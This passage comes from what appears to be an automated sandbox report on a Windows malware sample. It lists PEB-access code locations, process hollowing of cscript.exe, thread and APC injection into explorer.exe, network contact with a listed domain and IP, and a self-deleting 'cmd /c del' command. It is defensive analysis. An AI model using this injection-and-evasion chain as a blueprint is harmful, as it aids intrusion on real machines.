            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_048A3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_048A3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_048A3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_048A3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_048A3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_048A3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_048A3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_048A3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_048D3D43 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_04913540 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_048B7D50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_048BC577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_048BC577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_0492FE87 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_04960EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_04960EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_04960EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_049146A7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_04968ED6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_048C36CC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_048D8EC7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_0494FEC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_048A76E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_048C16E0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_0489C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_0489C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_0489C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_048C8E00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_048CA61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_048CA61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_04951608 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_0489E620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_0494FE3F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_048A7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_048A7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_048A7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_048A7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_048A7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_048A7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_0495AE44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_0495AE44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_048A766D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_048BAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048BAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048BAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048BAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048BAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04917794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04917794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04917794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048A8794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D37F5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0492FF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0492FF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048CA70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048CA70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0496070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0496070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048BF716 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04894F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04894F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048CE730 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048AEF40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048AFF60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04968F6A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04899080 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04913884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04913884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D90AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048CF0BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048CF0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048CF0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0492B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0492B8D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0492B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0492B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0492B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0492B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048958EC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04964015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04964015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04917016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04917016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04917016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048AB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048AB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048AB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048AB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048B0050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048B0050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04961074 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04952073 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048BC182 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048CA185 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C2990 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C61A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C61A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_049151BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_049151BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_049151BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_049151BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_049169A6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0489B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0489B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0489B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_049241E8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04899100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04899100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04899100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048B4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048B4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048B4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048B4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048B4120 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048BB944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048BB944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0489C962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0489B171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0489B171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048CD294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048CD294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048952A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048952A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048952A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048952A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048952A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048AAAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048AAAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048CFAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C2ACB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C2AE4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048A8A0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0495AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0495AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048B3A1C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04895210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04895210 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04895210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04895210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0489AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0489AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D4A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D4A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0495EA55 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04924257 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04899240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04899240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04899240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04899240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0494B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0494B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04968A62 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D927A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048A1B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048A1B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0494D380 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C2397 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048CB390 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0495138A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C4BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C4BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C4BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04965BA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_049153CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_049153CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048BDBE9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C03E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C03E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C03E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C03E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C03E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C03E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0495131B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0489DB40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04968B58 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0489F358 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0489DB60 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C3B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C3B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Process token adjusted: Debug
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe | Process token adjusted: Debug
            Source: C:\Windows\SysWOW64\cscript.exe | Process token adjusted: Debug
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion:

            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\explorer.exe | Domain query: www.comfsresidential.com
            Source: C:\Windows\explorer.exe | Network Connect: 185.53.178.50 80
            Injects a PE file into a foreign process
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Memory written: C:\Users\user\AppData\Local\Temp\New_1007572_021.exe base: 400000 value starts with: 4D5A
            Maps a DLL or memory area into another process
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe | Section loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe | Section loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\cscript.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
            Source: C:\Windows\SysWOW64\cscript.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe | Thread register set: target process: 3424
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe | Thread register set: target process: 3424
            Source: C:\Windows\SysWOW64\cscript.exe | Thread register set: target process: 3424
            Queues an APC in another process (thread injection)
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe | Thread APC queued: target process: C:\Windows\explorer.exe
            Sample uses process hollowing technique
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe | Section unmapped: C:\Windows\SysWOW64\cscript.exe base address: E0000
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Memory written: C:\Users\user\AppData\Local\Temp\New_1007572_021.exe base: 400000
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Memory written: C:\Users\user\AppData\Local\Temp\New_1007572_021.exe base: 401000
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Memory written: C:\Users\user\AppData\Local\Temp\New_1007572_021.exe base: 402000
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Memory written: C:\Users\user\AppData\Local\Temp\New_1007572_021.exe base: 403000
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Memory written: C:\Users\user\AppData\Local\Temp\New_1007572_021.exe base: 404000
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Memory written: C:\Users\user\AppData\Local\Temp\New_1007572_021.exe base: CAD008
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Process created: C:\Users\user\AppData\Local\Temp\New_1007572_021.exe C:\Users\user\AppData\Local\Temp\New_1007572_021.exe
            Source: C:\Users\user\AppData\Local\Temp\New_1007572_021.exe | Process created: C:\Users\user\AppData\Local\Temp\FB_5908.tmp.exe 'C:\Users\user\AppData\Local\Temp\FB_5908.tmp.exe'
            Source: C:\Users\user\AppData\Local\Temp\New_1007572_021.exe | Process created: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe 'C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe'
            Source: C:\Windows\SysWOW64\cscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe'
            Source: explorer.exe, 0000000B.00000000.745550579.0000000000AD8000.00000004.00000020.sdmp | Binary or memory string: ProgmanMD6
            Source: explorer.exe, 0000000B.00000000.784022003.0000000001080000.00000002.00000001.sdmp, cscript.exe, 00000013.00000002.925610456.0000000003460000.00000002.00000001.sdmp | Binary or memory string: Program Manager
            Source: explorer.exe, 0000000B.00000000.784022003.0000000001080000.00000002.00000001.sdmp, cscript.exe, 00000013.00000002.925610456.0000000003460000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
            Source: explorer.exe, 0000000B.00000000.784022003.0000000001080000.00000002.00000001.sdmp, cscript.exe, 00000013.00000002.925610456.0000000003460000.00000002.00000001.sdmp | Binary or memory string: Progman
            Source: explorer.exe, 0000000B.00000000.784022003.0000000001080000.00000002.00000001.sdmp, cscript.exe, 00000013.00000002.925610456.0000000003460000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
            Source: explorer.exe, 0000000B.00000000.771670358.000000000A716000.00000004.00000001.sdmp | Binary or memory string: Shell_TrayWnd5D
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Queries volume information: C:\Users\user\Desktop\New_1007572_021.exe VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
